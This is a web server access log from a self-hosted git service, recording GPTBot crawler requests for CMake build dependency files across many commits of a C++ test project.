"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24287] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24262] [Gzip 9.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10287] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10285] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 24426] [Gzip 15.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:15:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11309] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24287] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9942] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26855] [Gzip 20.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26860] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26832] [Gzip 20.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26857] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11313] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11308] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24294] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 